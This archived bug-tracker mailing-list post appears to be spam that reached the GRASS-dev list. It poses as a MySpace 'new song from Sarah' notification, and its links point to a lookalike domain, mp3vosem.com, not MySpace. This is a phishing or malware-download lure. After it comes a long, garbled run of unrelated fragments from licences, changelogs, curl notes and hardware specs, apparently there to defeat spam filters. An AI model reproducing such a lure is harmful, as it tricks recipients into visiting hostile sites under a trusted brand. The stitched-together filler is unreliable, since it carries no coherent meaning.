[GRASS-dev] [bug #5208] (grass) New message from Sarah on MySpace sent on Oct 12 15:40:00 -4 2006

Request Tracker grass-bugs at intevation.de
Thu Oct 12 15:54:57 EDT 2006

this bug's URL: http://intevation.de/rt/webrt?serial_num=5208

You've got a new song from Sarah on MySpace!

Click here to hear your MySpace music:
http://myspace.mp3vosem.com/?reloc.cfm=6&id=81875

Click here to get 5-free songs downloaded to Your Space:
http://myspace.mp3vosem.com/?reloc.cfm=6&id=8187550071_5free

-------------------------

At MySpace we care about your privacy. We have sent you this
notification to facilitate your use as a member of the MySpace service. If
you don't want to receive emails like this to your external email account
in the future, change your Account Settings to "Do not send me
notification emails"

Click here to change your Account Settings:
http://myspace.mp3vosem.com/?account.settings=update=6&id=81875

MySpace Inc. - 1900 Wilshire Blvd. 2109, Los Angeles, CA 90403-5400 USA

©2006 MySpace Inc. All Rights Reserved

You can find complete help in 'help.hlp' file
directory the executable curl is located in.
Assess/verify SRTM
#                      Sample Trustfile for Privoxy
Pentium III 800 MHz processor
password authentication method based on 128 bit strong encryption.
The default value is 0.
Privoxy 3.0 is finally released! This is way behind schedule, but better late
PowerVR Kyro accelerators
Assess Test Reports and test artifacts
"EditorF7Rules":REG_DWORD
Default ~!%^&*()+|{}:"<>?`-=\[];',./
Documentation feedback is welcome. Send email to
rights and obtaining all necessary third parties’ licenses or
4.3.7	Software Problem Reporting and Corrective Action
The FAR File and Archive Manager
determining the materiality of any other provision or breach
mouse-clicks or menu items--whatever suits your program.
ISO 9001
Security   is a critical consideration when implementing the remote
proprietary notices pertaining to this Software that appear
block like the DEL key.
Client Devices. You may not rent, lease, sublicense, lend or
Daniel (10 January 2005)
The key "Panel/RightClickRule" of DWORD type specifies behavior  of  the
immediate and automatic termination of this Agreement and the
case of future need.
of clues on this, and based on his suggestion I've now removed the check of
your rights to work written entirely by you; rather, the intent is to
added. TODO: add them to docs. add TFTP server to test suite. add TFTP to
defined, it assumes the glibc API. If not, it issues a notice as before that
authors' reputations.
location where you obtained it along with proof of purchase
report, I could find and fix this.
64 MB RAM
Daniel (29 August 2005)
like changing directory or retrieving a file, while the second means that we
RSA LABORATORIES, A DIVISION OF RSA DATA SECURITY, INC. ("RSA")
			    Preamble
curl_easy_perform() - the given file(s) to read was never read but the
3.4. Proprietary Notices and Copies.
The CVS tag 'before_ftp_statemachine' was set just before this went in, in
SYSTEM AND/OR SOFTWARE AVAILABILITY,
OTHER MATERIAL FURNISHED OR PROVIDED TO
than what the specs allow it to be, but I can't see how this modified